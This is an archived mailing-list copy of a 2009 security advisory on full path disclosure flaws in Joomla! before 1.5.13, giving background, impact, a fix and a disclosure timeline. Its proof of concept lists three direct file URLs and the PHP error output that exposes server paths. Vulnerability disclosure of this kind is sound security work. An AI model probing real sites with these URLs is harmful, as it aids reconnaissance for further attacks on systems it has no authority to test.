[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
[ISecAuditors Security Advisories] Joomla! < 1.5.12 Multiple Full Path Disclosure vulnerabilities
- To: bugs@xxxxxxxxxxxxxxxxxxx, news@xxxxxxxxxxxxxx, full-disclosure@xxxxxxxxxxxxxxxxx, vuln@xxxxxxxxxxx, packet@xxxxxxxxxxxxxxxxxxxxxxx, bugtraq@xxxxxxxxxxxxxxxxx
- Subject: [ISecAuditors Security Advisories] Joomla! < 1.5.12 Multiple Full Path Disclosure vulnerabilities
- From: ISecAuditors Security Advisories <advisories@xxxxxxxxxxxxxxxx>
- Date: Fri, 24 Jul 2009 12:00:23 +0200
=============================================
INTERNET SECURITY AUDITORS ALERT 2009-009
- Original release date: July 21st, 2009
- Last revised: July 23rd, 2009
- Discovered by: Juan Galiana Lara
- Severity: 5/10 (CVSS Base Score)
=============================================
I. VULNERABILITY
-------------------------
Joomla! < 1.5.12 Multiple Full Path Disclosure vulnerabilities
II. BACKGROUND
-------------------------
Joomla! is an award-winning content management system (CMS), which
enables you to build Web sites and powerful online applications. Many
aspects, including its ease-of-use and extensibility, have made
Joomla! the most popular Web site software available. Best of all,
Joomla! is an open source solution that is freely available to everyone.
III. DESCRIPTION
-------------------------
This vulnerability could allow a malicious user to view the internal
path information of the host due to some files were missing the check
for JEXEC.
IV. PROOF OF CONCEPT
-------------------------
The attacker can get the full path of the instalation of Joomla!
browsing to any of this urls:
http://example.com/joomla-1.5.12/libraries/joomla/utilities/compat/php50x.php
http://example.com/joomla-1.5.12/libraries/joomla/client/ldap.php
http://example.com/joomla-1.5.12/libraries/joomla/html/html/content.php
The information obtained contais the full path to the files:
<b>Parse error</b>: syntax error, unexpected T_CLONE, expecting
T_STRING in
<b>/var/www/joomla-1.5.12/libraries/joomla/utilities/compat/php50x.php</b>
on line <b>100</b><br />
<b>Fatal error</b>: Class 'JObject' not found in
<b>/var/www/joomla-1.5.12/libraries/joomla/client/ldap.php</b> on line
<b>21</b><br />
<b>Fatal error</b>: Class 'JLoader' not found in
<b>/var/www/joomla-1.5.12/libraries/joomla/html/html/content.php</b>
on line <b>15</b><br />
V. BUSINESS IMPACT
-------------------------
Full path disclosure vulnerabilities enables an attacker to know the
path to the web root. This information can be used in order to launch
further attacks.
VI. SYSTEMS AFFECTED
-------------------------
Joomla! versions prior and including 1.5.12 are vulnerable.
VII. SOLUTION
-------------------------
Upgrade to version 1.5.13
VIII. REFERENCES
-------------------------
http://www.joomla.org
http://www.isecauditors.com
IX. CREDITS
-------------------------
This vulnerability has been discovered
by Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).
X. REVISION HISTORY
-------------------------
July 21, 2009: Initial release.
July 23, 2009: Last revision.
XI. DISCLOSURE TIMELINE
-------------------------
July 21, 2009: Discovered by Internet Security Auditors.
July 21, 2009: Vendor contacted.
July 22, 2009: Joomla! publish update. Great job.
July 24, 2009: Advisory published.
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.